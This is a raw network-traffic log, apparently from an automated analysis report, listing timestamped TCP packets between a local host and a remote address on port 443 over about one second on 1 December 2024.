                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.617875099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.617940903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.617950916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.618016958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.625972986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.625988007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.626068115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.626076937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.626127958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.632939100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.632955074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.633063078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.633070946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.633148909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.640588999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.640608072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.640681028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.640688896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.640770912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.648708105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.648724079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.648802042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.648808956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.648902893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.702111006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.702131033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.702229977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.702244043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.704405069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.804014921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.804037094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.804133892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.804150105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.804233074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.811832905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.811847925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.811930895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.811939001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.812129021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819786072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819811106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819844007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819854975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819914103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.819914103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.826673985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.826690912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.826739073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.826759100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.826823950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.834752083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.834769011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.834819078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.834830999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.834892988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.842258930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.842274904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.842343092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.842361927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.842411041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.850318909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.850336075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.850403070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.850410938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.851789951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.903908014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.903928995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.903971910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.903980017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.904026985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.007463932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.007483006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.007582903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.007596970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.008703947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.015209913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.015225887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.015332937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.015341043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.016690016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.022305012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.022320986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.022387981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.022397041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.024708986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.030230999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.030247927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.030324936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.030333042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.030452967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038117886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038134098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038177013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038184881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038213015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.038223982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.046039104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.046056032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.046123981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.046135902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.048048973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.053642035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.053658962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.053702116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.053709984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.053778887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.105048895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.105067015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.105175972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.105186939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.105271101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.208194017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.208213091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.208354950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.208369970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.208672047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.216217041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.216233015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.216300964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.216310978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.216423035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.224193096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.224210024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.224288940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.224298954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.224370003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.232336998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.232352972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.232412100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.232426882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.232480049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.239222050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.239239931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.239319086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.239329100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.239396095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.246759892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.246774912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.246851921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.246860027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.246917009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.254647970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.254667997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.254774094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.254786968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.254795074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.255007982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.256428003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.305867910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.305883884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.305972099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.305980921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.306061029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412651062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412668943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412723064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412734985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412759066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.412776947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.419557095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.419570923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.419665098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.419676065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.419739962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427489042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427505016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427541971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427551985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427578926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.427603006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.435566902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.435587883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.435663939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.435674906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.435719013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.442552090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.442567110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.442625046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.442641020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.442720890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451000929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451024055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451062918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451073885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451086044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.451142073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.458014965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.458029985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.458113909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.458126068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.458174944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.508140087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.508157969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.508224010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.508235931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.508404016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.613223076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.613243103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.613312006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.613325119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.613394022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621165991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621184111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621268988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621279001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621289015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.621392012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.629188061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.629204988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.629264116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.629275084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.629359961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636264086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636280060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636358023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636368036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636390924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.636403084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.644157887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.644176006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.644237041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.644244909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.644289970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.652070045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.652085066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.652163982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.652172089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.652297020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.659555912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.659571886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.659665108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.659672022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.659918070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709289074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709315062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709371090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709382057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709443092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.709443092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.814523935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.814543962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.814671993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.814692974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.815613985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.822630882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.822650909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.822737932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.822748899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.824773073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.830451965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.830471992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.830562115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.830574989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.830905914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837414026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837443113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837517977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837527990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837544918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.837601900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845463037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845479965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845573902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845582962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845621109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.845621109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.853338957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.853353977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.853439093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.853446007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.854294062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:31.861013889 CET44349721142.132.252.48192.168.2.6
